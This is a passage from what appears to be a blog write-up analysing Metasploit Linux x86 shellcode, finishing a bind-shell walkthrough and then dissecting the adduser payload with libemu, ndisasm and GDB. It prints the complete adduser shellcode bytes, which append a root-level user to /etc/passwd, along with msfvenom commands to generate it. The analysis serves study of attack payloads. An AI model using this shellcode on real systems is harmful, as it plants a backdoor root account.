<strong>pathname<\/strong> argument, in this case set as two dwords to <strong>\/bin\/\/sh<\/strong>, is pushed to the stack. 
The <strong>ESP<\/strong> register is moved into <strong>EBX<\/strong>, storing the pointer to the <strong>pathname<\/strong> argument in that register. Next, <strong>EAX<\/strong>, which is set to <strong>0x0<\/strong>, is pushed to the stack to account for the <strong>argv<\/strong> argument. As neither <strong>argv<\/strong> nor <strong>envp<\/strong> needs to be set for our call to <strong>\/bin\/sh<\/strong>, both of these values are set to null.<\/p>\n\n\n\n<p>Finally, <strong>ESP<\/strong> is moved into <strong>ECX<\/strong> and the value <strong>0xb<\/strong> is moved into <strong>AL<\/strong> before the syscall is made. The result is a fully working bind shell.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Analysis with GDB<\/h3>\n\n\n\n<p>Next, we perform a dynamic analysis using gdb by stepping through the program one instruction at a time.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Compilation and setup<\/h3>\n\n\n\n<p>Before we begin, we use MSFvenom to output the bind shell shellcode in C format:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220503081934.png\" alt=\"\"\/><\/figure>\n\n\n\n<p>We then insert the shellcode into our C skeleton code, which we compile using gcc:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\ngcc -fno-stack-protector -z execstack shell_bind_tcp_shellcode.c -o shellcode\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220505080412.png\" alt=\"\"\/><\/figure>\n\n\n\n<p>Next, we launch gdb and set a breakpoint on the main function:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220503082051.png\" alt=\"\"\/><\/figure>\n\n\n\n<p>We run the main program and hit the breakpoint, positioning us at the start of the program:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220503082132.png\" alt=\"\"\/><\/figure>\n\n\n\n<p>We can use the <strong>disassemble<\/strong> command to break down the assembly instructions making up the shellcode:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220503082206.png\" alt=\"\"\/><\/figure>\n\n\n\n<p>We then set a breakpoint at the start of the linux\/x86\/shell_bind_tcp shellcode payload so we can begin stepping through it:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220503082539.png\" alt=\"\"\/><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\">socket analysis<\/h4>\n\n\n\n<p>We first step through the instructions up to the soft interrupt for <strong>socket<\/strong>, the first syscall, at <strong>0x40404d<\/strong>:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504212000.png\" alt=\"\"\/><\/figure>\n\n\n\n<p>Above, we note that <strong>EAX<\/strong> is set to <strong>0x66<\/strong> for the <strong>socketcall<\/strong> syscall, <strong>EBX<\/strong> is set to 1 to indicate we are calling <strong>socket<\/strong>, and <strong>ECX<\/strong> is pointing to the <strong>socket<\/strong> arguments on the stack.<\/p>\n\n\n\n<p>We can examine the socket arguments on the stack, and see they are set as 
follows:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504214538.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">bind analysis<\/h4>\n\n\n\n<p>We step to the syscall to <strong>bind<\/strong> and assess the arguments set at <strong>0x404060<\/strong>:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504213305.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Above, we note that <strong>EAX<\/strong> is set to <strong>0x66<\/strong> for the <strong>socketcall<\/strong> syscall, <strong>EBX<\/strong> is set to 2 to indicate we are calling <strong>bind<\/strong>, and <strong>ECX<\/strong> is pointing to the <strong>bind<\/strong> arguments on the stack.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504214230.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">listen analysis<\/h4>\n\n\n\n<p>We next step to the syscall to <strong>listen<\/strong> and analyse the arguments set at <strong>0x404069<\/strong>:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504220828.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Above, we note that <strong>EAX<\/strong> is set to <strong>0x66<\/strong> for the <strong>socketcall<\/strong> syscall, <strong>EBX<\/strong> is set to <strong>0x4<\/strong> to indicate we are calling <strong>listen<\/strong>, and <strong>ECX<\/strong> is pointing to the <strong>listen<\/strong> arguments on the stack.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" 
src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504221302.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">accept analysis<\/h4>\n\n\n\n<p>We next step to the syscall for <strong>accept<\/strong> and analyse the arguments set at <strong>0x40406e<\/strong>:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504215028.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Above, we note that <strong>EAX<\/strong> is set to <strong>0x66<\/strong> for the <strong>socketcall<\/strong> syscall, <strong>EBX<\/strong> is set to <strong>0x5<\/strong> to indicate we are calling <strong>accept<\/strong>, and <strong>ECX<\/strong> is pointing to the <strong>accept<\/strong> arguments on the stack.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504215805.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">dup2 analysis<\/h4>\n\n\n\n<p>We next step to the syscall for <strong>dup2<\/strong> and analyse the arguments set at <strong>0x404075<\/strong>:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504221756.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Above, we note that <strong>EAX<\/strong> is set to <strong>0x3F<\/strong> for the <strong>dup2<\/strong> syscall, <strong>EBX<\/strong> is set to <strong>0x4<\/strong>, which is the <strong>sockfd<\/strong> obtained from the connecting client, and will be used as the <strong>newfd<\/strong> argument. 
<strong>ECX<\/strong>, in this case stores the <strong>oldfd<\/strong>, and will iterate over 0, 1 and 2 for STDIN, STDOUT and STDERR:<\/p>\n\n\n\n<p>First call is made for STDERR:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504222344.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Second call is made for STDOUT:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504222521.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Final call is made for STDIN:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504222646.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">execve analysis<\/h4>\n\n\n\n<p>Finally, the syscall to <strong>execve<\/strong> is made. 
We analyse the arguments set at <strong>0x40408c<\/strong>:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504222920.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We note that the <strong>pathname<\/strong> argument is pointed to by the <strong>EBX<\/strong> register, and the remainder of the arguments are set to null.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504223133.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Following this call, the assembly code transfers control over to the <strong>\/bin\/sh<\/strong> program, completing the bind shell.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504223320.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Next, we move onto an analysis of the MSFvenom <strong>linux\/x86\/adduser<\/strong> shellcode.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">Shellcode 2: linux\/x86\/adduser<\/h2>\n\n\n\n<p>According to the description provided by <strong>MSFvenom<\/strong>, the <strong>linux\/x86\/adduser<\/strong> shellcode payload is designed to create a new user on the target system with root permissions (UID of 0).<\/p>\n\n\n\n<p>Looking at the payload options, this shellcode takes a <strong>username<\/strong>, a <strong>password<\/strong> and (optionally) a <strong>shell<\/strong> for the new user to use. 
By default, the username and password are both set to <strong>metasploit<\/strong> and the shell is set to <strong>\/bin\/sh<\/strong>.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\u250c\u2500\u2500(root\u327fkali)-&#x5B;\/opt\/libemu\/tools\/sctest]\n\u2514\u2500# msfvenom -p linux\/x86\/adduser --list-options                                                1 \u2a2f 1 \u2699\nOptions for payload\/linux\/x86\/adduser:\n=========================\n\n       Name: Linux Add User\n     Module: payload\/linux\/x86\/adduser\n   Platform: Linux\n       Arch: x86\nNeeds Admin: Yes\n Total size: 97\n       Rank: Normal\n\nProvided by:\n    skape &lt;mmiller@hick.org&gt;\n    vlad902 &lt;vlad902@gmail.com&gt;\n    spoonm &lt;spoonm@no$email.com&gt;\n\nBasic options:\nName   Current Setting  Required  Description\n----   ---------------  --------  -----------\nPASS   metasploit       yes       The password for this user\nSHELL  \/bin\/sh          no        The shell for this user\nUSER   metasploit       yes       The username to create\n\nDescription:\n  Create a new user with UID 0\n<\/pre><\/div>\n\n\n<p>To validate that this is the true functionality of the shellcode, we will perform analysis in the next section.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Emulation with Libemu<\/h3>\n\n\n\n<p>To begin, we use the <strong>sctest<\/strong> program from Libemu to emulate the <strong>linux\/x86\/adduser<\/strong> shellcode.<\/p>\n\n\n\n<p>We supply the arguments as follows:<\/p>\n\n\n\n<p><strong>msfvenom<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>-p<\/strong>: Payload option set to linux\/x86\/adduser<\/li>\n\n\n\n<li><strong>R<\/strong>: Output shellcode in raw bytes<\/li>\n<\/ul>\n\n\n\n<p><strong>sctest<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>-vvv<\/strong>: Set verbosity mode to 3.<\/li>\n\n\n\n<li><strong>-S<\/strong>: Read 
shellcode from stdin<\/li>\n\n\n\n<li><strong>-s<\/strong>: Run for 10,000 steps<\/li>\n\n\n\n<li><strong>-G<\/strong>: Save graphical output<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; gutter: false; title: ; notranslate\" title=\"\">\nmsfvenom -p linux\/x86\/adduser R | .\/sctest -vvv -Ss 10000 -G adduser.dot\n<\/pre><\/div>\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\ngraph file adduser.dot\nverbose = 3\n&#x5B;-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload\n&#x5B;-] No arch selected, selecting arch: x86 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 97 bytes\n\n&#x5B;emu 0x0x75f640 debug ] cpu state    eip=0x00417000\n&#x5B;emu 0x0x75f640 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000\n&#x5B;emu 0x0x75f640 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x75f640 debug ] Flags: \n&#x5B;emu 0x0x75f640 debug ] cpu state    eip=0x00417000\n&#x5B;emu 0x0x75f640 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000\n&#x5B;emu 0x0x75f640 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x75f640 debug ] Flags: \n&#x5B;emu 0x0x75f640 debug ] 31C9                            xor ecx,ecx\n&#x5B;emu 0x0x75f640 debug ] cpu state    eip=0x00417002\n&#x5B;emu 0x0x75f640 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000\n&#x5B;emu 0x0x75f640 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x75f640 debug ] Flags: PF ZF \n&#x5B;emu 0x0x75f640 debug ] 89CB                            mov ebx,ecx\n&#x5B;emu 0x0x75f640 debug ] cpu state    eip=0x00417004\n&#x5B;emu 0x0x75f640 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000\n&#x5B;emu 0x0x75f640 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  
edi=0x00000000\n&#x5B;emu 0x0x75f640 debug ] Flags: PF ZF \n&#x5B;emu 0x0x75f640 debug ] 6A46                            push byte 0x46\n&#x5B;emu 0x0x75f640 debug ] cpu state    eip=0x00417006\n&#x5B;emu 0x0x75f640 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000\n&#x5B;emu 0x0x75f640 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x75f640 debug ] Flags: PF ZF \n&#x5B;emu 0x0x75f640 debug ] 58                              pop eax\n&#x5B;emu 0x0x75f640 debug ] cpu state    eip=0x00417007\n&#x5B;emu 0x0x75f640 debug ] eax=0x00000046  ecx=0x00000000  edx=0x00000000  ebx=0x00000000\n&#x5B;emu 0x0x75f640 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x75f640 debug ] Flags: PF ZF \n&#x5B;emu 0x0x75f640 debug ] CD80                            int 0x80\nstepcount 4\ncopying vertexes\noptimizing graph\nvertex 0x7c0850\ngoing forwards from 0x7c0850\n -&gt; vertex 0x7c0a70\n -&gt; vertex 0x7c0b60\n -&gt; vertex 0x7c0c40\ncopying edges for 0x7c0c40\nvertex 0x7c0e30\ngoing forwards from 0x7c0e30\ncopying edges for 0x7c0e30\n&#x5B;emu 0x0x75f640 debug ] cpu state    eip=0x00417009\n&#x5B;emu 0x0x75f640 debug ] eax=0x00000046  ecx=0x00000000  edx=0x00000000  ebx=0x00000000\n&#x5B;emu 0x0x75f640 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x75f640 debug ] Flags: PF ZF\n<\/pre><\/div>\n\n\n<p>For this payload, considerably less information is returned by using Libemu, meaning we will have to rely on the other two tools to better grasp how it is working.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Disassembly with Ndisasm<\/h3>\n\n\n\n<p>Next, we use ndisasm to disassemble the shellcode generated by MSFvenom. 
The payload gets broken down into its assembly instructions as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nmsfvenom -p linux\/x86\/adduser R | ndisasm -u -                                                  1 \u2699\n&#x5B;-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload\n&#x5B;-] No arch selected, selecting arch: x86 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 97 bytes\n\n00000000  31C9              xor ecx,ecx\n00000002  89CB              mov ebx,ecx\n00000004  6A46              push byte +0x46\n00000006  58                pop eax\n00000007  CD80              int 0x80\n00000009  6A05              push byte +0x5\n0000000B  58                pop eax\n0000000C  31C9              xor ecx,ecx\n0000000E  51                push ecx\n0000000F  6873737764        push dword 0x64777373\n00000014  682F2F7061        push dword 0x61702f2f\n00000019  682F657463        push dword 0x6374652f\n0000001E  89E3              mov ebx,esp\n00000020  41                inc ecx\n00000021  B504              mov ch,0x4\n00000023  CD80              int 0x80\n00000025  93                xchg eax,ebx\n00000026  E828000000        call 0x53\n0000002B  6D                insd\n0000002C  657461            gs jz 0x90\n0000002F  7370              jnc 0xa1\n00000031  6C                insb\n00000032  6F                outsd\n00000033  69743A417A2F6449  imul esi,&#x5B;edx+edi+0x41],dword 0x49642f7a\n0000003B  736A              jnc 0xa7\n0000003D  3470              xor al,0x70\n0000003F  3449              xor al,0x49\n00000041  52                push edx\n00000042  633A              arpl &#x5B;edx],di\n00000044  303A              xor &#x5B;edx],bh\n00000046  303A              xor &#x5B;edx],bh\n00000048  3A2F              cmp ch,&#x5B;edi]\n0000004A  3A2F              cmp ch,&#x5B;edi]\n0000004C  62696E            bound 
ebp,&#x5B;ecx+0x6e]\n0000004F  2F                das\n00000050  7368              jnc 0xba\n00000052  0A598B            or bl,&#x5B;ecx-0x75]\n00000055  51                push ecx\n00000056  FC                cld\n00000057  6A04              push byte +0x4\n00000059  58                pop eax\n0000005A  CD80              int 0x80\n0000005C  6A01              push byte +0x1\n0000005E  58                pop eax\n0000005F  CD80              int 0x80\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220505074254.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Whilst this output gives us the assembly instructions, we need to do a bit of digging to identify the syscalls that are performed. We can backtrace this based on the value stored in the <strong>EAX<\/strong> register prior to each call to <strong>int 0x80<\/strong>. Note that the bytes between the <strong>call 0x53<\/strong> and the <strong>pop ecx<\/strong> at 0x55 are not code at all: they are the embedded \/etc\/passwd entry string, which ndisasm has decoded as nonsense instructions.<\/p>\n\n\n\n<p>From this, we pick out a list of syscalls using the following syscall numbers:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>0x46 - syscall 70 - <strong>setreuid<\/strong><\/li>\n\n\n\n<li>0x5 - syscall 5 - <strong>open<\/strong><\/li>\n\n\n\n<li>0x4 - syscall 4 - <strong>write<\/strong><\/li>\n\n\n\n<li>0x1 - syscall 1 - <strong>exit<\/strong><\/li>\n<\/ul>\n\n\n\n<p>Below are the function prototypes (from the manual pages) of each syscall identified in the adduser payload from the Ndisasm output:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint setreuid(uid_t ruid, uid_t euid);\n<\/pre><\/div>\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint open(const char *pathname, int flags);\n<\/pre><\/div>\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nssize_t write(int fd, const void *buf, size_t 
count);\n<\/pre><\/div>\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nvoid exit(int status);\n<\/pre><\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Analysis with GDB<\/h3>\n\n\n\n<p>Next, we perform a dynamic analysis using gdb by stepping through the program an instruction at a time.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Compilation and setup<\/h4>\n\n\n\n<p>Before we begin, we use MSFvenom to output the shellcode into C format:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nmsfvenom -p linux\/x86\/adduser -f C                                                              1 \u2699\n&#x5B;-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload\n&#x5B;-] No arch selected, selecting arch: x86 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 97 bytes\nFinal size of c file: 433 bytes\nunsigned char buf&#x5B;] = \n&quot;\\x31\\xc9\\x89\\xcb\\x6a\\x46\\x58\\xcd\\x80\\x6a\\x05\\x58\\x31\\xc9\\x51&quot;\n&quot;\\x68\\x73\\x73\\x77\\x64\\x68\\x2f\\x2f\\x70\\x61\\x68\\x2f\\x65\\x74\\x63&quot;\n&quot;\\x89\\xe3\\x41\\xb5\\x04\\xcd\\x80\\x93\\xe8\\x28\\x00\\x00\\x00\\x6d\\x65&quot;\n&quot;\\x74\\x61\\x73\\x70\\x6c\\x6f\\x69\\x74\\x3a\\x41\\x7a\\x2f\\x64\\x49\\x73&quot;\n&quot;\\x6a\\x34\\x70\\x34\\x49\\x52\\x63\\x3a\\x30\\x3a\\x30\\x3a\\x3a\\x2f\\x3a&quot;\n&quot;\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x0a\\x59\\x8b\\x51\\xfc\\x6a\\x04\\x58&quot;\n&quot;\\xcd\\x80\\x6a\\x01\\x58\\xcd\\x80&quot;;\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220505080114.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We then compile the shellcode with gcc:<\/p>\n\n\n<div 
class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\ngcc -fno-stack-protector -z execstack adduser_shellcode.c -o shellcode\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220505080434.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Next, we launch gdb and set a breakpoint on the main function using the <strong>break<\/strong> command:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220505082849.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We run the main program and hit the breakpoint, positioning us at the start of the program:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220505082927.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We can then use the <strong>disassemble<\/strong> command to break down the assembly instructions making up the shellcode:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220505083056.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We then set a breakpoint at the start of the linux\/x86\/adduser shellcode payload so we can analyse it:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220505083239.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">setreuid analysis<\/h4>\n\n\n\n<p>We first step to the syscall for <strong>setreuid<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220505083519.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Above, we note that <strong>EAX<\/strong> holds the syscall number <strong>0x46<\/strong> for <strong>setreuid<\/strong>, with <strong>EBX<\/strong> and <strong>ECX<\/strong> set to 0.<\/p>\n\n\n\n<p>Based on the manual page entry for <strong>setreuid<\/strong>, the syscall sets the real and effective user IDs of the calling process. As adding a new user to the <strong>\/etc\/passwd<\/strong> file requires root permissions, both the <strong>ruid<\/strong> and <strong>euid<\/strong> arguments are set to 0 for root.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">open analysis<\/h4>\n\n\n\n<p>Next, we step to the syscall for <strong>open<\/strong> and analyse the arguments.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220505084841.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>In the <strong>EAX<\/strong> register, we note that the syscall number for <strong>open<\/strong> (<strong>0x5<\/strong>) is present. In <strong>EBX<\/strong>, the pointer to the filepath for <strong>\/etc\/passwd<\/strong> is stored. 
<strong>ECX<\/strong>, which holds the <strong>flags<\/strong> argument, contains the value <strong>0x401<\/strong>.<\/p>\n\n\n\n<p>By referring to \/usr\/include\/asm-generic\/fcntl.h, we can see that the flag value <strong>0x401<\/strong> is the combination of the <a href=\"https:\/\/www.gnu.org\/software\/libc\/manual\/html_node\/Open_002dtime-Flags.html\">open flags<\/a> <strong>O_WRONLY<\/strong> (00000001 octal, 0x1) and <strong>O_APPEND<\/strong> (00002000 octal, 0x400), which indicates <strong>open<\/strong> is being used to <strong>write<\/strong> to the file with every write appended at the end of it, rather than overwriting existing entries.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220505085910.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">write analysis<\/h4>\n\n\n\n<p>Once the <strong>\/etc\/passwd<\/strong> file has been opened, a <strong>call<\/strong> instruction is made.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506072747.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>This instruction moves EIP to the location <strong>0x404093<\/strong> and resumes execution.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506073509.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>When we step into this instruction, we note that the top of the stack (<strong>ESP<\/strong>) now holds the return address pushed by the <strong>call<\/strong>, which is the address of the string that will be written to the chosen file. This string is a new user entry for the default option 'metasploit', and will be appended to the \/etc\/passwd file following this call.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506073711.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>At the time of the call to <strong>write<\/strong>, we see that <strong>EAX<\/strong> contains the syscall number <strong>0x4<\/strong>, <strong>EBX<\/strong> contains the file descriptor (<strong>fd<\/strong>) of the \/etc\/passwd file, <strong>ECX<\/strong> contains the string to write to the file (<strong>*buf<\/strong>) and <strong>EDX<\/strong> contains the number of bytes (<strong>count<\/strong>) to write from the string, which is 0x28 (40 bytes).<\/p>\n\n\n\n<p>The string in <strong>ECX<\/strong> is set to 